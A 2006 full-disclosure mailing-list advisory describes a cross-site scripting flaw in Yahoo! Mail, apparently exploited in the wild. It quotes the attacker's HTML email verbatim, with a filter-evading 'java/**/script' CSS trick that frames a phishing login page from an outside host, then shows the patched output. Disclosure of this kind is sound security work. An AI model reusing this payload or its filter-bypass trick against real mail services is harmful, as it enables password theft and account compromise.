[Full-disclosure] [Argeniss] Alert - Yahoo! Mail XSS vulnerability

Yahoo! Mail XSS vulnerability

Description:

Yahoo! Mail is a very insecure and free Web Mail
service. It allows HTML messages but it has filters to
avoid malicius script being executed on users
browsers. On 17 April 2006 I received a message that
when viewed it redirected to a fake Yahoo! Mail login
web page, I could realize about this because a strange
domain was displayed on IE status bar.
When looking at the HTML code I found out that the
message was:

...Message text ...<BR><BR><a target="_blank"
href="www.blabla23.com>"style="background:url\(java/**/script:document.write('<frameset
cols=100% rows=100% border=0
frameboarder=0framespacing=0><frame frameborder=0
src=http://w00tynetwork.com/x/></frameset>'))"></a><p>

You can see that the attacker used some tricks to
bypass filters, but we can't know all the tricks the
attacker used because some chars were removed or
replaced by the filter. That script loaded a fake
Yahoo! Mail login web page in order to steal
passwords.

Yahoo! was contacted and they responded that the issue
was going to be fixed, after that I haven't hear any
news about them. It seems that the issue was fixed
because now the same message is displayed as:

...Message text ...<BR><BR><a target="_blank"
href="www.blabla23.com>"style="background:url\(_java/**/script:document.write('<xframeset
cols=100% rows=100% border=0
frameboarder=0framespacing=0><xframe frameborder=0
src=http://w00tynetwork.com/x/></frameset>'))"></a><p>

Now filters were improved, whenever the word
javascript appears a "_" is appended at the begining,
and a "x" is appended at the begining of dangerous
HTML tags.

Again Yahoo! didn't released any advisory nor
contacted customers about this issue.
This issue was exploited for long time by malicious
people for stealing passwords and cookies in order to
compromise Yahoo! Mail users accounts, so it's very
important that Yahoo! Mail users change their
passwords just in case their accounts were
compromised.



Cesar.


__________________________________________________
Do You Yahoo!?
Tired of spam? Yahoo! Mail has the best spam
protection around
http://mail.yahoo.com

__________________________________________________
Do You Yahoo!?
Tired of spam? Yahoo! Mail has the best spam protection around
http://mail.yahoo.com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Relevant Pages

  • Re: Question about weird email messages
    ... was from a newsgroup I participate in. ... to carry image spam (regular spam can be filtered against by keywords so ... image spam is a workaround) but hopefully TB just filters away any ... My yahoo account to which I have left many times it's address to those ...
    (rec.games.computer.ultima.dragons)
  • Re. More on spam
    ... Filters will not solve the problem. ... that so much spam is coming in that it overloads the ... "reject sender" option, because the spammers targeting ... Do you Yahoo!? ...
    (Debian-User)
  • Re. More on spam
    ... Filters will not solve the problem. ... that so much spam is coming in that it overloads the ... "reject sender" option, because the spammers targeting ... Do you Yahoo!? ...
    (Debian-User)
  • Re: Fakes by the thousands
    ... don't use that for usenet though. ... checked Yahoo address, because I don't really care if it's spammed. ... pretty decent spam filter. ... I find the Hotmail filters to be better than ...
    (alt.usage.english)
  • [Argeniss] Alert - Yahoo! Mail XSS vulnerability
    ... Yahoo! ... It allows HTML messages but it has filters to ... When looking at the HTML code I found out that the ... Mail has the best spam ...
    (Bugtraq)